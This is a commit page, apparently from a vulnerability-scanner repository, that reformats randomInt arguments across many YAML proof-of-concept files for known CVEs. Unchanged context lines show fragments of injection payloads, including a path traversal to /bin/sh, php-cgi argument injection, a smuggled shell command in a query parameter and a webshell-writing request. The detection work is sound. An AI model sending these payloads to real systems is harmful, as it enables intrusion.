修复 Unparse 中的部分问题

flachi1109 · Nov 25, 2019 · 853cd96 · 853cd96
1 parent 1f55937
commit 853cd96
Show file tree

Hide file tree

Showing 31 changed files with 496 additions and 46 deletions.
diff --git a/pocs/bash-cve-2014-6271.yml b/pocs/bash-cve-2014-6271.yml
@@ -1,7 +1,7 @@
 name: poc-yaml-bash-cve-2014-6271
 set:
-  r1: randomInt(800000000,1000000000)
-  r2: randomInt(800000000,1000000000)
+  r1: randomInt(800000000, 1000000000)
+  r2: randomInt(800000000, 1000000000)
 rules:
   - method: GET
     headers:

diff --git a/pocs/discuz-ml3x-cnvd-2019-22239.yml b/pocs/discuz-ml3x-cnvd-2019-22239.yml
@@ -1,6 +1,6 @@
 name: poc-yaml-discuz-ml3x-cnvd-2019-22239
 set:
-  r1: randomInt(800000000,1000000000)
+  r1: randomInt(800000000, 1000000000)
 rules:
   - method: GET
     path: /forum.php

diff --git a/pocs/discuz-v7-rce.yml b/pocs/discuz-v7-rce.yml
@@ -1,6 +1,6 @@
 name: poc-yaml-discuz-wooyun-2010-080723
 set:
-  rand: randomInt(200000000,210000000)
+  rand: randomInt(200000000, 210000000)
 rules:
   - method: GET
     path: >-

diff --git a/pocs/ecology-javabeanshell-rce.yml b/pocs/ecology-javabeanshell-rce.yml
@@ -1,7 +1,7 @@
 name: poc-yaml-ecology-javabeanshell-rce
 set:
-  r1: randomInt(40000,44800)
-  r2: randomInt(40000,44800)
+  r1: randomInt(40000, 44800)
+  r2: randomInt(40000, 44800)
 rules:
   - method: POST
     path: /weaver/bsh.servlet.BshServlet

diff --git a/pocs/ecshop-360-rce.yml b/pocs/ecshop-360-rce.yml
@@ -1,7 +1,7 @@
 name: poc-yaml-ecshop-360-rce
 set:
-  r1: randomInt(40000,44800)
-  r2: randomInt(40000,44800)
+  r1: randomInt(40000, 44800)
+  r2: randomInt(40000, 44800)
 rules:
   - method: POST
     path: /user.php

diff --git a/pocs/elasticsearch-cve-2014-3120.yml b/pocs/elasticsearch-cve-2014-3120.yml
@@ -1,7 +1,7 @@
 name: poc-yaml-elasticsearch-cve-2014-3120
 set:
-  r: randomInt(800000000,1000000000)
-  r1: randomInt(800000000,1000000000)
+  r: randomInt(800000000, 1000000000)
+  r1: randomInt(800000000, 1000000000)
 rules:
   - method: POST
     path: /test/test1/

diff --git a/pocs/elasticsearch-cve-2015-1427.yml b/pocs/elasticsearch-cve-2015-1427.yml
@@ -1,7 +1,7 @@
 name: poc-yaml-elasticsearch-cve-2015-1427
 set:
-  r1: randomInt(40000,44800)
-  r2: randomInt(40000,44800)
+  r1: randomInt(40000, 44800)
+  r2: randomInt(40000, 44800)
 rules:
   - method: POST
     path: /test/test

diff --git a/pocs/joomla-ext-zhbaidumap-cve-2018-6605-sqli.yml b/pocs/joomla-ext-zhbaidumap-cve-2018-6605-sqli.yml
@@ -1,6 +1,6 @@
 name: poc-yaml-joomla-ext-zhbaidumap-cve-2018-6605-sqli
 set:
-  rand: randomInt(2000000000,2100000000)
+  rand: randomInt(2000000000, 2100000000)
 rules:
   - method: POST
     path: >-

diff --git a/pocs/metinfo-cve-2019-16996-sqli.yml b/pocs/metinfo-cve-2019-16996-sqli.yml
@@ -1,7 +1,7 @@
 name: poc-yaml-metinfo-cve-2019-16996-sqli
 set:
-  r1: randomInt(40000,44800)
-  r2: randomInt(40000,44800)
+  r1: randomInt(40000, 44800)
+  r2: randomInt(40000, 44800)
 rules:
   - method: GET
     path: >-

diff --git a/pocs/metinfo-cve-2019-16997-sqli.yml b/pocs/metinfo-cve-2019-16997-sqli.yml
@@ -1,7 +1,7 @@
 name: poc-yaml-metinfo-cve-2019-16997-sqli
 set:
-  r1: randomInt(40000,44800)
-  r2: randomInt(40000,44800)
+  r1: randomInt(40000, 44800)
+  r2: randomInt(40000, 44800)
 rules:
   - method: POST
     path: /admin/?n=language&c=language_general&a=doExportPack

diff --git a/pocs/metinfo-cve-2019-17418-sqli.yml b/pocs/metinfo-cve-2019-17418-sqli.yml
@@ -1,7 +1,7 @@
 name: poc-yaml-metinfo-cve-2019-17418-sqli
 set:
-  r1: randomInt(40000,44800)
-  r2: randomInt(40000,44800)
+  r1: randomInt(40000, 44800)
+  r2: randomInt(40000, 44800)
 rules:
   - method: GET
     path: >-

diff --git a/pocs/nhttpd-cve-2019-16278.yml b/pocs/nhttpd-cve-2019-16278.yml
@@ -1,7 +1,7 @@
 name: poc-yaml-nhttpd-cve-2019-16278
 set:
-  r1: randomInt(800000000,1000000000)
-  r2: randomInt(800000000,1000000000)
+  r1: randomInt(800000000, 1000000000)
+  r2: randomInt(800000000, 1000000000)
 rules:
   - method: POST
     path: "/.%0d./.%0d./.%0d./.%0d./bin/sh HTTP/1.0"

diff --git a/pocs/php-cgi-cve-2012-1823.yml b/pocs/php-cgi-cve-2012-1823.yml
@@ -1,6 +1,6 @@
 name: poc-yaml-php-cgi-cve-2012-1823
 set:
-  rand: randomInt(200000000,210000000)
+  rand: randomInt(200000000, 210000000)
 rules:
   - method: POST
     path: /index.php?-d+allow_url_include%3don+-d+auto_prepend_file%3dphp%3a//input

diff --git a/pocs/phpunit-cve-2017-9841-rce.yml b/pocs/phpunit-cve-2017-9841-rce.yml
@@ -1,6 +1,6 @@
 name: poc-yaml-phpunit-cve-2017-9841-rce
 set:
-  rand: randomInt(2000000000,2100000000)
+  rand: randomInt(2000000000, 2100000000)
 rules:
   - method: POST
     path: /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php

diff --git a/pocs/rconfig-cve-2019-16663.yml b/pocs/rconfig-cve-2019-16663.yml
@@ -1,7 +1,7 @@
 name: poc-yaml-rconfig-cve-2019-16663
 set:
-  r: randomInt(800000000,1000000000)
-  r1: randomInt(800000000,1000000000)
+  r: randomInt(800000000, 1000000000)
+  r1: randomInt(800000000, 1000000000)
 rules:
   - method: GET
     path: /install/lib/ajaxHandlers/ajaxServerSettingsChk.php?rootUname=%3Bexpr%20{{r}}%20%2B%20{{r1}}%20%20%23

diff --git a/pocs/seacms-rce.yml b/pocs/seacms-rce.yml
@@ -1,7 +1,7 @@
 name: poc-yaml-seacms-rce
 set:
-  r: randomInt(800000000,1000000000)
-  r1: randomInt(800000000,1000000000)
+  r: randomInt(800000000, 1000000000)
+  r1: randomInt(800000000, 1000000000)
 rules:
   - method: POST
     path: "/search.php?print({{r}}%2b{{r1}})"

diff --git a/pocs/seacms-v654-rce.yml b/pocs/seacms-v654-rce.yml
@@ -1,6 +1,6 @@
 name: poc-yaml-seacms-v654-rce
 set:
-  rand: randomInt(2000000000,2100000000)
+  rand: randomInt(2000000000, 2100000000)
 rules:
   - method: POST
     path: /search.php

diff --git a/pocs/solr-cve-2019-0193.yml b/pocs/solr-cve-2019-0193.yml
@@ -1,7 +1,7 @@
 name: poc-yaml-solr-cve-2019-0193
 set:
-  r1: randomInt(40000,44800)
-  r2: randomInt(40000,44800)
+  r1: randomInt(40000, 44800)
+  r2: randomInt(40000, 44800)
 rules:
   - method: GET
     path: /solr/admin/cores?wt=json

diff --git a/pocs/solr-velocity-template-rce.yml b/pocs/solr-velocity-template-rce.yml
@@ -1,7 +1,7 @@
 name: poc-yaml-solr-cve-2019-0193
 set:
-  r1: randomInt(20000,40000)
-  r2: randomInt(20000,40000)
+  r1: randomInt(20000, 40000)
+  r2: randomInt(20000, 40000)
 rules:
   - method: GET
     path: "/solr/admin/cores?wt=json"

diff --git a/pocs/thinkcmf-write-shell.yml b/pocs/thinkcmf-write-shell.yml
@@ -1,7 +1,7 @@
 name: poc-yaml-thinkcmf-write-shell
 set:
-  r: randomInt(10000,20000)
-  r1: randomInt(1000000000,2000000000)
+  r: randomInt(10000, 20000)
+  r1: randomInt(1000000000, 2000000000)
 rules:
   - method: GET
     path: "/index.php?a=fetch&content=%3C?php+file_put_contents(%22{{r}}.php%22,%22%3C?php+echo+{{r1}};%22);"

diff --git a/pocs/vbulletin-cve-2019-16759.yml b/pocs/vbulletin-cve-2019-16759.yml
@@ -1,6 +1,6 @@
 name: poc-yaml-vbulletin-cve-2019-16759
 set:
-  rand: randomInt(2000000000,2100000000)
+  rand: randomInt(2000000000, 2100000000)
 rules:
   - method: POST
     path: /

diff --git a/pocs/webmin-cve-2019-15107.yml b/pocs/webmin-cve-2019-15107.yml
@@ -1,7 +1,7 @@
 name: poc-yaml-webmin-cve-2019-15107-rce
 set:
-  r1: randomInt(800000000,1000000000)
-  r2: randomInt(800000000,1000000000)
+  r1: randomInt(800000000, 1000000000)
+  r2: randomInt(800000000, 1000000000)
 rules:
   - method: POST
     path: /password_change.cgi

diff --git a/pocs/wordpress-ext-mailpress-rce.yml b/pocs/wordpress-ext-mailpress-rce.yml
@@ -1,7 +1,7 @@
 name: poc-yaml-wordpress-ext-mailpress-rce
 set:
-  r: randomInt(800000000,1000000000)
-  r1: randomInt(800000000,1000000000)
+  r: randomInt(800000000, 1000000000)
+  r1: randomInt(800000000, 1000000000)
 rules:
   - method: POST
     path: "/wp-content/plugins/mailpress/mp-includes/action.php"

diff --git a/pocs/yccms-rce.yml b/pocs/yccms-rce.yml
@@ -1,7 +1,7 @@
 name: poc-yaml-yccms-rce
 set:
-  r: randomInt(800000000,1000000000)
-  r1: randomInt(800000000,1000000000)
+  r: randomInt(800000000, 1000000000)
+  r1: randomInt(800000000, 1000000000)
 rules:
   - method: GET
     path: "/admin/?a=Factory();print({{r}}%2b{{r1}});//../"

diff --git a/pocs/youphptube-encoder-cve-2019-5127.yml b/pocs/youphptube-encoder-cve-2019-5127.yml
@@ -1,6 +1,6 @@
 name: poc-yaml-youphptube-encoder-cve-2019-5127
 set:
-  r1: randomInt(800000000,1000000000)
+  r1: randomInt(800000000, 1000000000)
   r2: base64("`echo " + string(r1) + " > " + string(r1) + ".txt`")
 rules:
   - method: GET

diff --git a/pocs/youphptube-encoder-cve-2019-5128.yml b/pocs/youphptube-encoder-cve-2019-5128.yml
@@ -1,6 +1,6 @@
 name: poc-yaml-youphptube-encoder-cve-2019-5128
 set:
-  r1: randomInt(800000000,1000000000)
+  r1: randomInt(800000000, 1000000000)
   r2: base64("`echo " + string(r1) + " > " + string(r1) + ".txt`")
 rules:
   - method: GET

diff --git a/pocs/youphptube-encoder-cve-2019-5129.yml b/pocs/youphptube-encoder-cve-2019-5129.yml
@@ -1,6 +1,6 @@
 name: poc-yaml-youphptube-encoder-cve-2019-5129
 set:
-  r1: randomInt(800000000,1000000000)
+  r1: randomInt(800000000, 1000000000)
   r2: base64("`echo " + string(r1) + " > " + string(r1) + ".txt`")
 rules:
   - method: GET

diff --git a/pocs/yungoucms-sqli.yml b/pocs/yungoucms-sqli.yml
@@ -1,6 +1,6 @@
 name: poc-yaml-yungoucms-sqli
 set:
-  rand: randomInt(2000000000,2100000000)
+  rand: randomInt(2000000000, 2100000000)
 rules:
   - method: GET
     path: >-